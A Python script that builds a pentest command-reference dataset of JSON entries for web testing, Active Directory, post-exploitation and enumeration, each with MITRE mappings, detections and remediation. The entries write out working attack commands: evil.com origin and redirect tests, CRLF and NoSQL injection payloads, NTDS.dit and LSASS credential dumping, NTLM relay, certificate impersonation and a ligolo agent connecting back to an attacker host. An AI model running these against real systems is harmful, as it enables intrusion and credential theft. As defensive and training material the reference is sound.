#!/usr/bin/env python3
"""Bulk generator batch 4 — pushing toward 250+."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== MORE WEB (20) =====================
WEB4=[
e("nuclei-takeover","nuclei","web_testing",4,LWM,"nuclei -u http://<target> -t takeovers/","Subdomain Takeover Check","Detects dangling DNS records pointing to unclaimed services (S3, Heroku, GitHub Pages, etc.).",{"-t takeovers/":"Takeover detection templates"},"[takeover] [high] http://old.target.com → GitHub Pages (unclaimed)","Find subdomains pointing to decommissioned services that can be claimed by attackers.",["Subdomain list"],["T1584"],"Resource Development",["DNS changes","New content on previously dead subdomains"],["Remove stale DNS records","Monitor for dangling CNAMEs"],["Not checking all subdomains"],["subjack","can-i-take-over-xyz"],["https://github.com/projectdiscovery/nuclei-templates"],["takeover","subdomain","dangling","dns"]),
e("arjun-params","arjun","web_testing",4,L,"arjun -u http://<target>/endpoint","Hidden Parameter Discovery","Dedicated tool for finding hidden HTTP parameters using smart heuristics.",{"-u":"Target URL"},"[+] Found: debug, admin, token, api_key\n[+] 4 parameters discovered","Find hidden parameters that may expose debug info or bypass authentication.",["Target URL"],["T1190"],"Initial Access",["Unusual parameters in requests"],["Remove debug parameters","Input validation"],["Not trying POST/JSON modes"],["ffuf param fuzzing","paramspider"],["https://github.com/s0md3v/Arjun"],["parameter","discovery","hidden","web"]),
e("smuggler-http","smuggler","web_testing",4,L,"python3 smuggler.py -u http://<target>/","HTTP Request Smuggling","Tests for HTTP request smuggling vulnerabilities (CL.TE, TE.CL, TE.TE).",{"-u":"Target URL"},"[+] CL.TE smuggling detected!\n[+] Potential for cache poisoning","Detect request smuggling — can lead to cache poisoning, auth bypass, and request hijacking.",["HTTP/1.1 target behind reverse proxy"],["T1190"],"Initial Access",["Malformed Content-Length/Transfer-Encoding","Backend errors"],["Normalize HTTP parsing","Disable HTTP/1.1 where possible"],["Target using HTTP/2 end-to-end"],["burp turbo intruder","defparam"],["https://portswigger.net/web-security/request-smuggling"],["smuggling","http","cache-poisoning","proxy"]),
e("cors-misconfiguration","curl","web_testing",4,LWM,"curl -s -I -H 'Origin: https://evil.com' http://<target>/api/ | grep -i access-control","CORS Misconfiguration Test","Tests if the server reflects arbitrary origins in CORS headers — allows cross-origin data theft.",{"-H 'Origin: https://evil.com'":"Fake origin","grep access-control":"Check CORS headers"},"Access-Control-Allow-Origin: https://evil.com\nAccess-Control-Allow-Credentials: true","If server reflects any origin with credentials, attackers can steal user data cross-origin.",["API endpoint"],["T1189"],"Initial Access",["Unusual Origin headers","Cross-origin requests from unknown domains"],["Whitelist specific origins","Never reflect arbitrary origins with credentials"],["Not testing with credentials flag"],["burp scanner","corsy"],["https://portswigger.net/web-security/cors"],["cors","misconfiguration","cross-origin","api"]),
e("crlf-injection","curl","web_testing",4,LWM,"curl -v 'http://<target>/redirect?url=http://target.com%0d%0aSet-Cookie:hacked=true'","CRLF Injection Test","Tests for HTTP header injection via CRLF characters (%0d%0a) in parameters.",{"%0d%0a":"Carriage Return + Line Feed (header separator)"},"< HTTP/1.1 302 Found\n< Location: http://target.com\n< Set-Cookie: hacked=true","Inject arbitrary HTTP headers — can set cookies, redirect, or enable XSS.",["Parameter reflected in HTTP headers"],["T1190"],"Initial Access",["CRLF characters in request parameters","Unusual Set-Cookie headers"],["Sanitize CRLF from all input","Don't reflect user input in headers"],["Not URL-encoding properly"],["crlfuzz","burp scanner"],["https://owasp.org/www-community/vulnerabilities/CRLF_Injection"],["crlf","header-injection","cookie","redirect"]),
e("open-redirect","curl","web_testing",4,LWM,"curl -v 'http://<target>/login?next=https://evil.com'","Open Redirect Test","Tests if redirect parameters accept external URLs — used for phishing.",{"next=https://evil.com":"External redirect URL"},"< HTTP/1.1 302 Found\n< Location: https://evil.com","Open redirects enable convincing phishing — victim sees legitimate domain in link.",["URL parameter controlling redirects"],["T1566"],"Initial Access",["Redirects to external domains","Unusual redirect patterns"],["Whitelist redirect destinations","Validate redirect URLs server-side"],["Not trying bypass techniques (//evil.com, /\\evil.com)"],["openredirex","burp scanner"],["https://portswigger.net/web-security/open-redirect"],["redirect","phishing","bypass","url"]),
e("graphql-introspection","curl","web_testing",4,LWM,"curl -s -X POST http://<target>/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name,fields{name}}}}\"}'","GraphQL Introspection","Queries GraphQL schema to discover all types, fields, and mutations — full API mapping.",{"__schema":"Introspection query"},"{\n  \"types\": [\n    {\"name\": \"User\", \"fields\": [{\"name\": \"id\"}, {\"name\": \"email\"}, {\"name\": \"password\"}]}\n  ]\n}","Map the entire GraphQL API — find sensitive fields, mutations, and hidden functionality.",["GraphQL endpoint"],["T1190"],"Reconnaissance",["Introspection queries in logs"],["Disable introspection in production","Implement query depth limiting"],["Introspection disabled (try field suggestion)"],["graphql-voyager","InQL (Burp extension)"],["https://graphql.org/learn/introspection/"],["graphql","introspection","api","schema","discovery"]),
e("nosql-injection","curl","web_testing",4,LWM,"curl -X POST http://<target>/login -H 'Content-Type: application/json' -d '{\"username\":{\"$ne\":\"\"},\"password\":{\"$ne\":\"\"}}'","NoSQL Injection","Tests for MongoDB NoSQL injection using operator injection ($ne, $gt, $regex).",{"$ne":"Not equal operator (bypasses auth)"},"{\n  \"token\": \"eyJhbGciOiJIUzI1NiJ9...\",\n  \"user\": \"admin\"\n}","Bypass authentication in MongoDB-backed applications using operator injection.",["MongoDB backend","JSON input accepted"],["T1190"],"Initial Access",["Unusual MongoDB operators in input","Auth bypass events"],["Input validation","Use parameterized queries","Sanitize $ operators"],["Application doesn't use MongoDB"],["nosqlmap","burp with NoSQL payloads"],["https://book.hacktricks.wiki/en/pentesting-web/nosql-injection"],["nosql","mongodb","injection","authentication-bypass"]),
e("prototype-pollution","node","web_testing",4,LWM,"# Test: POST /api/merge with body:\n{\"__proto__\":{\"isAdmin\":true}}","Prototype Pollution","Tests for JavaScript prototype pollution — can lead to RCE in Node.js applications.",{"__proto__":"JavaScript prototype chain manipulation"},"# After pollution:\nGET /api/profile → {\"isAdmin\": true}","Modify JavaScript object prototypes to escalate privileges or achieve RCE.",["Node.js/JavaScript backend","Object merge functionality"],["T1059"],"Execution",["Unusual __proto__ in request bodies","Application behavior changes"],["Freeze prototypes","Validate input keys","Use Map instead of Object"],["Application not using vulnerable merge"],["ppfuzz","burp with proto payloads"],["https://portswigger.net/web-security/prototype-pollution"],["prototype","pollution","javascript","nodejs","rce"]),
e("race-condition","turbo-intruder","web_testing",4,LWM,"# Burp Turbo Intruder: Send 20 requests simultaneously\n# Target: POST /api/transfer (amount=1000)\n# Goal: Transfer executes multiple times before balance check","Race Condition Exploitation","Exploits time-of-check-to-time-of-use (TOCTOU) vulnerabilities by sending concurrent requests.",{"Turbo Intruder":"Burp extension for parallel requests"},"# Result: Balance deducted once, but transfer executed 5 times","Exploit race conditions in financial transactions, coupon redemption, or vote systems.",["Endpoint with non-atomic operations","Burp Turbo Intruder"],["T1190"],"Initial Access",["Multiple identical requests in milliseconds","Inconsistent database state"],["Use database transactions","Implement idempotency keys","Mutex/locking"],["Not sending enough concurrent requests"],["racepwn","turbo intruder"],["https://portswigger.net/web-security/race-conditions"],["race-condition","toctou","concurrent","financial"]),
]

# ===================== MORE AD (15) =====================
AD4=[
e("netexec-spider","netexec","active_directory",6,L,"netexec smb <target> -u user -p pass --spider C$ --regex '(password|credential|secret)'","SMB Spider (File Search)","Recursively searches SMB shares for files matching regex patterns.",{"--spider C$":"Crawl C$ share","--regex":"Search pattern"},"[+] //target/C$/Users/admin/Desktop/passwords.txt\n[+] //target/C$/Scripts/deploy_creds.ps1","Find sensitive files (passwords, credentials, configs) across network shares.",["Admin access to shares"],["T1039","T1552"],"Collection",["Mass file access on shares","Regex-based file searching"],["Remove sensitive files from shares","DLP"],["Not trying other shares (SYSVOL, NETLOGON)"],["snaffler","manspider"],["https://github.com/Pennyw0rth/NetExec"],["spider","file-search","credentials","shares"]),
e("netexec-ntds","netexec","active_directory",6,L,"netexec smb <dc_ip> -u admin -p pass --ntds","Dump NTDS.dit (All Domain Hashes)","Remotely dumps all domain password hashes from NTDS.dit via VSS.",{"--ntds":"Dump NTDS.dit using Volume Shadow Copy"},"Administrator:500:aad3b435...:fc525c96...:::\nkrbtgt:502:aad3b435...:4a889942...:::","Extract every domain account hash — complete domain compromise.",["Domain Admin credentials","SMB access to DC"],["T1003.003"],"Credential Access",["VSS creation on DC","NTDS.dit access events"],["Monitor VSS operations on DCs","Restrict DA usage"],["Not having DA rights"],["impacket-secretsdump","ntdsutil"],["https://github.com/Pennyw0rth/NetExec"],["ntds","domain","all-hashes","dcsync","complete"]),
e("mitm6-attack","mitm6","active_directory",6,L,"mitm6 -d <domain> & impacket-ntlmrelayx -6 -t ldaps://<dc_ip> --delegate-access","IPv6 DNS Takeover","Exploits IPv6 to become the DNS server, then relays authentication for delegation access.",{"mitm6":"IPv6 DNS poisoning","ntlmrelayx -6":"Relay IPv6 auth","--delegate-access":"Create computer with delegation"},"[*] IPv6 DNS takeover active\n[+] Relayed auth: CORP\\PC01$\n[+] Created computer with delegation rights","Combine IPv6 poisoning with NTLM relay for domain escalation — very effective in modern AD.",["IPv6 enabled (default)","LDAPS on DC"],["T1557","T1187"],"Credential Access",["IPv6 DNS responses from non-DC","New computer objects","Delegation changes"],["Disable IPv6 if not needed","Enable LDAP signing","Monitor computer object creation"],["IPv6 disabled","LDAP signing enforced"],["Responder (IPv4 only)","PetitPotam"],["https://github.com/dirkjanm/mitm6"],["ipv6","dns","relay","delegation","takeover"]),
e("snaffler-search","snaffler","active_directory",6,W,"Snaffler.exe -s -o snaffler_results.txt","Snaffler (Credential Finder)","Automatically finds sensitive files across all readable shares — passwords, keys, configs.",{"-s":"Stdout output","-o":"Output file"},"[Black] \\\\DC01\\SYSVOL\\scripts\\deploy.ps1 (contains: password=)\n[Red] \\\\FS01\\HR\\salaries.xlsx","Automated credential hunting across network shares — much faster than manual searching.",["Domain user credentials","Network share access"],["T1552","T1039"],"Collection",["Mass share enumeration","File access patterns"],["Remove credentials from shares","DLP monitoring"],["Not running as domain user"],["netexec --spider","manspider"],["https://github.com/SnaffCon/Snaffler"],["snaffler","credentials","shares","automated","hunting"]),
e("adcs-esc1","certipy","active_directory",6,L,"certipy req -u user@corp.local -p pass -ca CORP-CA -template VulnTemplate -upn administrator@corp.local","AD CS ESC1 Exploitation","Exploits ESC1 misconfiguration to request a certificate as any user (e.g., Administrator).",{"-ca":"Certificate Authority","-template":"Vulnerable template","-upn":"Target user to impersonate"},"[*] Certificate for 'administrator@corp.local' saved to admin.pfx","Request a certificate impersonating Domain Admin — then use it for authentication.",["ESC1 vulnerable template found (certipy find)","Valid domain credentials"],["T1649"],"Privilege Escalation",["Certificate request with different UPN","Unusual template usage"],["Fix template permissions","Disable SAN specification","Audit CA templates"],["Template not vulnerable","CA denies request"],["Certify.exe (Windows)"],["https://github.com/ly4k/Certipy"],["adcs","esc1","certificate","impersonation","domain-admin"]),
e("pass-the-cert","certipy","active_directory",6,L,"certipy auth -pfx admin.pfx -dc-ip <dc_ip>","Pass-the-Certificate","Authenticates using a certificate (PFX) to get a TGT — no password needed.",{"-pfx":"Certificate file","-dc-ip":"Domain controller"},"[*] Got TGT for administrator@corp.local\n[*] Saved to administrator.ccache","Use a forged/stolen certificate to authenticate as any user.",["Valid certificate (PFX file)","DC accessible"],["T1649"],"Credential Access",["Certificate-based authentication from unusual source"],["Monitor certificate usage","Revoke compromised certificates"],["Certificate expired or revoked"],["Rubeus asktgt /certificate:"],["https://github.com/ly4k/Certipy"],["certificate","authentication","tgt","pass-the-cert"]),
]

# ===================== MORE POST-EX (15) =====================
PX4=[
e("ligolo-setup","ligolo-ng","post_exploitation",6,LW,"# Proxy (attacker): sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up\n# Start: ligolo-proxy -selfcert\n# Agent: ligolo-agent -connect <attacker>:11601 -ignore-cert","Ligolo-ng Full Setup","Complete Ligolo-ng setup for transparent network pivoting — no SOCKS needed.",{"ip tuntap add":"Create TUN interface","ligolo-proxy":"Start proxy","ligolo-agent":"Run on target"},"[+] Agent joined: agent@target\n>> session\n>> ifconfig\n>> start","Best pivoting tool — adds target's network as a route, no proxychains needed.",["TUN interface support","Agent on target"],["T1572"],"Command and Control",["TLS connections to unusual ports","New network routes"],["Egress filtering","Monitor for tunneling"],["Not adding route (ip route add <net> dev ligolo)"],["chisel","ssh -D"],["https://github.com/nicocha30/ligolo-ng"],["ligolo","pivoting","transparent","tunnel","setup"]),
e("procdump-lsass","procdump","post_exploitation",6,W,"procdump.exe -accepteula -ma lsass.exe lsass.dmp","Dump LSASS with ProcDump","Uses Microsoft's legitimate ProcDump to dump LSASS memory — less likely to be flagged by AV.",{"-accepteula":"Accept EULA","-ma":"Full memory dump","lsass.exe":"Target process"},"[*] Dump 1 initiated: lsass.dmp\n[*] Dump 1 complete: 45 MB written","Dump LSASS using a signed Microsoft tool — bypasses some AV/EDR.",["Admin/SYSTEM privileges","ProcDump on target"],["T1003.001"],"Credential Access",["LSASS memory access","ProcDump execution"],["Credential Guard","PPL for LSASS","Monitor LSASS access"],["Credential Guard enabled","EDR still detects"],["comsvcs.dll MiniDump","nanodump","pypykatz (parse offline)"],["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump"],["lsass","dump","procdump","credentials","evasion"]),
e("pypykatz-offline","pypykatz","post_exploitation",6,L,"pypykatz lsa minidump lsass.dmp","Parse LSASS Dump Offline","Parses LSASS memory dumps on Linux — extract credentials without running mimikatz on target.",{"lsa minidump":"Parse minidump format","lsass.dmp":"Dump file"},"== NTLM ==\nUsername: Administrator\nNT: fc525c9683e8fe067095ba2ddc971889","Extract credentials from LSASS dumps on your Linux attack machine.",["LSASS dump file transferred to attacker"],["T1003.001"],"Credential Access",["N/A — offline analysis"],["Credential Guard","Don't leave dumps accessible"],["Wrong dump format"],["mimikatz (on Windows)","secretsdump"],["https://github.com/skelsec/pypykatz"],["lsass","offline","parse","linux","credentials"]),
e("sharphound-acl","bloodhound","post_exploitation",6,W,"# In BloodHound: Analytics → Find Principals with DCSync Rights\n# Or: MATCH (n)-[:MemberOf*1..]->(g:Group)-[:DCSync]->(d:Domain) RETURN n","BloodHound ACL Analysis","Uses BloodHound to find dangerous ACL permissions — GenericAll, WriteDACL, DCSync rights.",{"Cypher query":"Custom graph query","Analytics":"Built-in queries"},"Path: helpdesk_user → GenericAll → Domain Admins group","Find ACL-based attack paths that don't require exploits — just permission abuse.",["BloodHound data collected"],["T1069"],"Discovery",["N/A — offline analysis"],["Audit ACLs regularly","Remove unnecessary permissions"],["Not checking custom queries"],["aclpwn","PowerView Get-DomainObjectAcl"],["https://bloodhound.specterops.io"],["acl","permissions","attack-path","bloodhound"]),
e("rubeus-s4u","rubeus","post_exploitation",6,W,"Rubeus.exe s4u /user:svc_sql /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/target /ptt","Constrained Delegation Abuse","Abuses constrained delegation to impersonate any user to the delegated service.",{"/user":"Service account","/rc4":"Account hash","/impersonateuser":"Target user","/msdsspn":"Delegated SPN","/ptt":"Inject ticket"},"[+] TGS for administrator@corp.local to cifs/target\n[+] Ticket injected","Impersonate Domain Admin to specific services via constrained delegation.",["Service account hash","Constrained delegation configured"],["T1550"],"Lateral Movement",["S4U2Self/S4U2Proxy requests","Unusual service ticket requests"],["Audit delegation settings","Use RBCD instead","Monitor S4U requests"],["Delegation not configured on account"],["impacket-getST"],["https://github.com/GhostPack/Rubeus"],["delegation","s4u","impersonation","kerberos","lateral"]),
e("secretsdump-local","impacket","post_exploitation",6,L,"impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL","Offline SAM/SYSTEM Extraction","Extracts hashes from saved SAM/SYSTEM/SECURITY registry hives offline.",{"-sam SAM":"SAM hive file","-system SYSTEM":"SYSTEM hive","-security SECURITY":"SECURITY hive","LOCAL":"Process locally"},"Administrator:500:aad3b435...:fc525c96...:::\nGuest:501:aad3b435...:...:::","Extract hashes from registry hive backups without touching the live system.",["SAM, SYSTEM, SECURITY files (from reg save or backup)"],["T1003.002"],"Credential Access",["N/A — offline"],["Protect registry backups","Encrypt backup media"],["Files not from same machine (different boot key)"],["mimikatz lsadump::sam","samdump2"],["https://github.com/fortra/impacket"],["sam","offline","registry","hives","extraction"]),
]

# ===================== ENUMERATION EXTRAS (10) =====================
EN4=[
e("ftp-bounce","nmap","enumeration",2,LWM,"nmap -b <ftp_server> <target>","FTP Bounce Scan","Uses an FTP server to scan another host — the FTP server acts as a proxy.",{"-b":"FTP bounce scan via specified server"},"PORT   STATE SERVICE\n80/tcp open  http (via FTP bounce)","Scan hosts behind firewalls using a misconfigured FTP server as a relay.",["FTP server allowing PORT command to other hosts"],["T1090"],"Defense Evasion",["Unusual FTP PORT commands","FTP data connections to third parties"],["Disable FTP bounce (modern servers do by default)"],["Very rare — most FTP servers patched"],["nmap -sS (direct scan)"],["https://nmap.org/book/man-port-scanning-techniques.html"],["ftp","bounce","proxy","scan","evasion"]),
e("ike-scan","ike-scan","enumeration",2,L,"ike-scan <target>","IKE/VPN Gateway Detection","Detects IPSec VPN gateways and identifies their configuration.",{"<target>":"Target IP"},"192.168.1.1\tMain Mode Handshake returned\n\tAuth=PSK, Enc=3DES, Hash=SHA1","Discover VPN gateways and their encryption settings — weak configs may be exploitable.",["UDP port 500 open"],["T1046"],"Discovery",["IKE probes on port 500"],["Use strong VPN configurations","Restrict VPN access"],["Not trying aggressive mode (ike-scan -A)"],["nmap --script ike-version"],["https://github.com/royhills/ike-scan"],["vpn","ipsec","ike","gateway","detection"]),
e("smtp-commands","nmap","enumeration",2,LWM,"nmap --script smtp-commands -p 25 <target>","SMTP Command Enumeration","Discovers supported SMTP commands — VRFY and EXPN enable user enumeration.",{"--script smtp-commands":"Check supported commands"},"| smtp-commands: mail.target.com\n|   VRFY, EXPN, ETRN, SIZE, HELP","Identify if SMTP server supports VRFY/EXPN for user enumeration.",["SMTP port 25 open"],["T1589"],"Reconnaissance",["SMTP command probing"],["Disable VRFY and EXPN"],["Not following up with user enumeration"],["smtp-user-enum","swaks"],["https://nmap.org/nsedoc/scripts/smtp-commands.html"],["smtp","commands","vrfy","expn","mail"]),
e("oracle-sid","odat","enumeration",2,L,"odat sidguesser -s <target> -p 1521","Oracle SID Guessing","Brute-forces Oracle database SIDs — needed before connecting to Oracle.",{"-s":"Target","-p":"Port (1521)"},"[+] SID found: ORCL\n[+] SID found: XE","Discover Oracle database SIDs for further enumeration and exploitation.",["Oracle port 1521 open"],["T1046"],"Discovery",["Multiple TNS connection attempts"],["Use complex SID names","Restrict TNS listener access"],["Not trying common SIDs (ORCL, XE, PROD)"],["nmap --script oracle-sid-brute","tnscmd10g"],["https://github.com/quentinhardy/odat"],["oracle","sid","database","brute-force"]),
e("mssql-enum","impacket","enumeration",2,L,"impacket-mssqlclient <domain>/<user>:<pass>@<target> -windows-auth","MSSQL Client Connection","Connects to Microsoft SQL Server with Windows authentication for enumeration.",{"-windows-auth":"Use Windows/domain authentication"},"SQL> SELECT @@version;\nMicrosoft SQL Server 2019\nSQL> SELECT name FROM sys.databases;","Connect to MSSQL for enumeration — check for xp_cmdshell, linked servers, impersonation.",["MSSQL port 1433 open","Valid credentials"],["T1078"],"Initial Access",["SQL login events","Unusual queries"],["Restrict SQL access","Disable xp_cmdshell","Least privilege"],["Not checking xp_cmdshell","Missing linked servers"],["sqsh","dbeaver","netexec mssql"],["https://github.com/fortra/impacket"],["mssql","database","windows-auth","enumeration"]),
]

def save(fn,data):
    path=OUTPUT_DIR/fn
    with open(path,'w') as f: json.dump(data,f,indent=2)
    print(f"  {fn}: {len(data)}")

if __name__=="__main__":
    print("Batch 4...")
    save("bulk4_web.json",WEB4)
    save("bulk4_ad.json",AD4)
    save("bulk4_postex.json",PX4)
    save("bulk4_enum.json",EN4)
    total=0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp: total+=len(json.load(fp))
    print(f"\nTOTAL: {total}")
